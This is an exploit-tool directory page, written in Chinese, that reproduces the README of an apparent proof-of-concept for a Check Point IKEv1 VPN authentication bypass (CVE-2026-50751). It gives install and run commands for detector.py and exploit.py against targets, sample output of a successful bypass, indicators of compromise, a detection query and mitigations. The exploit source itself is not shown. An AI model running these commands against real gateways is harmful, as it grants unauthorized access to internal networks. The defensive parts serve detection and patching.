Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-50751---Check-Point-IKEv1-Authentication-Bypass-Exploit — 漏洞:远程访问和移动访问中的逻辑流程弱点 | Kitploit
工具/GitHubGitHub/fevar54/cve-2026-50751---check-point-ikev1-authentication-bypass-exploit
身份验证与授权漏洞扫描器漏洞分析漏洞利用网络安全渗透测试
GitHubfevar54/cve-2026-50751---check-point-ikev1-authentication-bypass-exploit

CVE-2026-50751---Check-Point-IKEv1-Authentication-Bypass-Exploit

漏洞:远程访问和移动访问中的逻辑流程弱点

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
1373个月前尚未审核

CVE-2026-50751 - Check Point IKEv1 认证绕过利用工具

Security Rating CVSS CISA KEV License Python

⚠️ 重要警告

此代码仅用于教育目的和授权的安全测试。 未经明确许可对系统进行未授权使用是非法的。 作者不对该工具的滥用行为承担任何责任。

📋 描述

CVE-2026-50751 是 Check Point 已弃用的 IKEv1 协议中的一个严重认证绕过漏洞,影响 Remote Access VPN 和 Mobile Access。未认证的攻击者可利用证书验证中的缺陷,在无需有效密码的情况下建立 VPN 连接。

技术细节

  • 类型:认证绕过 (CWE-287)
  • CVSS 评分:9.3(严重)
  • 攻击向量:AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
  • 主动利用:是(自 2026-05-07 起)
  • CISA KEV:添加于 2026-06-08,截止于 2026-06-11

🎯 受影响版本

产品版本
Security Gateways启用 IKEv1 的 R80.40 - R82.10
Spark FirewallsR80.20.X, R81.10.X, R82.00.X
Mobile Access所有启用 IKEv1 的版本

所需条件

  • ✅ 启用 VPN Remote Access 或 Mobile Access
  • ✅ 为 remote access 启用 IKEv1
  • ✅ Gateway 接受旧版 Remote Access 客户端
  • ✅ 不需要机器证书

🔧 安装

root@kitploit:~
# 克隆仓库
git clone https://github.com/username/CVE-2026-50751-PoC
cd CVE-2026-50751-PoC

# 安装依赖
pip install -r requirements.txt

# 赋予执行权限
chmod +x exploit.py
📦 依赖
txt
cryptography>=41.0.0
scapy>=2.5.0
🚀 用法
检测扫描
bash
# 检测 IKEv1 是否启用
python3 detector.py -t 192.168.1.1 -p 500

# 快速扫描
python3 detector.py -t vpn.target.com -p 4500
利用(仅限授权使用)
bash
# 执行认证绕过
python3 exploit.py -t 192.168.1.1 -p 500

# 指定网络接口
python3 exploit.py -t vpn.target.com --interface eth0

# 详细模式
python3 exploit.py -t 192.168.1.1 -p 500 -v
预期输出
text
╔═══════════════════════════════════════════════════════════════╗
║  CVE-2026-50751 - Check Point IKEv1 Authentication Bypass   ║
║  Critical VPN Authentication Bypass Exploit                 ║
║  CVSS: 9.3 | CISA KEV: 2026-06-08                          ║
╚═══════════════════════════════════════════════════════════════╝

[1] Initiating IKEv1 Main Mode...
[+] Received response - SPI: a1b2c3d4e5f67890
[2] Sending crafted KE + NONCE payloads...
[+] Gateway accepted crafted KE/NONCE - Vulnerability triggered!
[3] Calculating authentication keys...
[4] Sending spoofed authentication...
[+] SUCCESS! Authentication bypassed!
[+] Established IKE SA without valid credentials
[5] Establishing VPN tunnel...
[+] VPN tunnel established!
[+] Internal network access available

[✓] EXPLOIT SUCCESSFUL
[✓] Authentication bypass achieved
[✓] VPN tunnel established
[!] System is VULNERABLE - Apply hotfix immediately
🔍 入侵检测
在 SmartConsole 日志中搜索
bash
# 查询检测攻击者
action:"Key Install" AND (src:45.77.149.152 OR dst:45.77.149.152)
已知 IOC
类型	值
攻击者 IP	45.77.149.152, 209.182.225.136, 38.60.157.139, 162.33.177.101, 45.76.26.42, 144.208.127.155, 38.54.88.201, 38.54.107.167, 66.42.99.200, 45.63.104.106, 45.61.136.173
哈希值	52fda5c1b9704544f32ee98d9060e689, 51d39aa39478beeac94f2d12f682ecce
🛡️ 缓解措施
选项 1 - 应用热修复(推荐)
版本	Hotfix Take	下载链接
R82.10	Take 19	下载
R82	Take 103	下载
R81.20	Take 141	下载
选项 2 - 临时缓解措施
禁用旧版客户端:

SmartConsole → Gateway → VPN Clients → Authentication

取消勾选 "Allow older clients"

仅强制 IKEv2:

Global Properties → Remote Access → VPN Authentication

选择 "IKEv2 only"

强制要求 Machine Certificate:

VPN Clients → Authentication → Machine Certificate Authentication

设置为 "Mandatory"

📚 参考资料
NVD - CVE-2026-50751

Check Point SK185033

CISA Known Exploited Vulnerabilities

博客文章 - Check Point Research

📊 时间线
日期	事件
2026-05-07	首次观察到利用行为
2026-06-04	Check Point 启动调查
2026-06-08	CVE 发布,CISA 将其加入 KEV
2026-06-11	CISA 建议修补的截止日期
⚖️ 免责声明
本软件按“原样”提供,不提供任何形式的担保。作者不对该工具的滥用行为负责。请仅在您拥有或已获得明确授权测试的系统上使用。

📞 联系方式
如需报告漏洞或贡献代码:

在 GitHub 上打开 Issue

联系邮箱:[email protected]

🌟 致谢
Check Point Research - 发现并分析漏洞

CISA - 协调与发布

安全社区 - 快速响应

⭐ 如果此 PoC 对您有帮助,请考虑给仓库点个星

---

## 📄 **许可证** (GPLv3)

---

📦 requirements.txt
txt
cryptography>=41.0.0
scapy>=2.5.0
colorama>=0.4.6
⚠️ GitHub 重要提示:
下载工具